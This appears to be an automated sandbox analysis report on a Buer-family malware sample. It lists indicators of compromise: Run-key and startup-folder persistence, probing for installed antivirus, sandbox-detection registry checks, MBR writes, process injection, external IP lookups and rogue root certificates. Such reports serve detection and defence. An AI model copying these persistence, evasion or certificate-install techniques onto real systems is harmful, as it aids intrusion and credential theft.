buer | a546a1f257585e2f4c093db2b7eeb6413a314ffb1296d97fd31d0363e827cc65

System Information Discovery

Processes:

7028980.77

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7028980.77
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7028980.77

Drops startup file 1 IoCs

Processes:

7028980.77

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 7028980.77
Loads dropped DLL 3 IoCs

Processes:

MsiExec.exe4743103.522cyz23u2nve.tmp

pid process

3616 MsiExec.exe
4036 4743103.52
4576 2cyz23u2nve.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	7028980.77

pid	process
3616	MsiExec.exe
4036	4743103.52
4576	2cyz23u2nve.tmp

themida 3 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\7028980.77	themida
C:\ProgramData\7028980.77	themida
behavioral2/memory/2204-175-0x0000000000200000-0x0000000000201000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

multitimer.exe5930241.65gcttt.exe7028980.77

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fo3mha1p041 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\33N4J37VE0\\multitimer.exe\" 1 3.1615014596.60432ac408364"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	5930241.65
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\7028980.77"	7028980.77

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

md2_2efs.exe7028980.77

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7028980.77

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 20 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
582	ipinfo.io
652	ipinfo.io
190	ipinfo.io
309	ipinfo.io
323	ipinfo.io
381	ip-api.com
474	ipinfo.io
477	ipinfo.io
85	ip-api.com
110	ipinfo.io
549	ipinfo.io
623	ipinfo.io
692	ip-api.com
730	checkip.amazonaws.com
113	ipinfo.io
255	ipinfo.io
554	checkip.amazonaws.com
625	ipinfo.io
23	api.ipify.org
187	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Setup.exe7028980.77

pid process

400 Setup.exe
2204 7028980.77

Suspicious use of SetThreadContext 4 IoCs

Processes:

615F.tmp.exeC0CA61A12E4C8B38.exe

description	pid	process	target process
PID 2096 set thread context of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 904 set thread context of 1924	904	C0CA61A12E4C8B38.exe	wmiprvse.exe
PID 904 set thread context of 5092	904	C0CA61A12E4C8B38.exe	firefox.exe
PID 904 set thread context of 4940	904	C0CA61A12E4C8B38.exe	firefox.exe

Drops file in Windows directory 2 IoCs

Processes:

multitimer.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6048	4644	WerFault.exe	g3zc0niealn.exe
4436	4644	WerFault.exe	g3zc0niealn.exe
4548	4644	WerFault.exe	g3zc0niealn.exe
3932	4644	WerFault.exe	g3zc0niealn.exe
5992	4644	WerFault.exe	g3zc0niealn.exe
6440	4644	WerFault.exe	g3zc0niealn.exe
6608	4644	WerFault.exe	g3zc0niealn.exe
5012	6572	WerFault.exe	a531j3uggm3.exe
6988	6572	WerFault.exe	a531j3uggm3.exe
5196	6572	WerFault.exe	a531j3uggm3.exe
6220	6572	WerFault.exe	a531j3uggm3.exe
5132	6572	WerFault.exe	a531j3uggm3.exe
5064	6572	WerFault.exe	a531j3uggm3.exe
4928	6572	WerFault.exe	a531j3uggm3.exe
7824	5460	WerFault.exe	4964.tmp.exe
8208	7952	WerFault.exe	MicrosoftEdgeCP.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

C0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

615F.tmp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	615F.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	615F.tmp.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

1232 timeout.exe
4936 timeout.exe
7192 timeout.exe
4388 timeout.exe

pid	process
1232	timeout.exe
4936	timeout.exe
7192	timeout.exe
4388	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3520	taskkill.exe
5728	taskkill.exe
3472	taskkill.exe
2148	taskkill.exe
5916	TASKKILL.exe
5772	taskkill.exe
6852	taskkill.exe
6872	taskkill.exe
11156	taskkill.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

file.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

file.exeSetup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

5744 regedit.exe
6552 regedit.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

3236 PING.EXE
1464 PING.EXE
4332 PING.EXE
1512 PING.EXE

pid	process
5744	regedit.exe
6552	regedit.exe

pid	process
3236	PING.EXE
1464	PING.EXE
4332	PING.EXE
1512	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	624	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	111	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	253	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	322	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	475	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	548	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	581	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	650	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	116	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	189	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	308	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	482	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exe615F.tmp.exe1615014376668.exe1615014381668.exemultitimer.exe

pid	process
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
3224	file.exe
4000	615F.tmp.exe
4000	615F.tmp.exe
3876	1615014376668.exe
3876	1615014376668.exe
1000	1615014381668.exe
1000	1615014381668.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
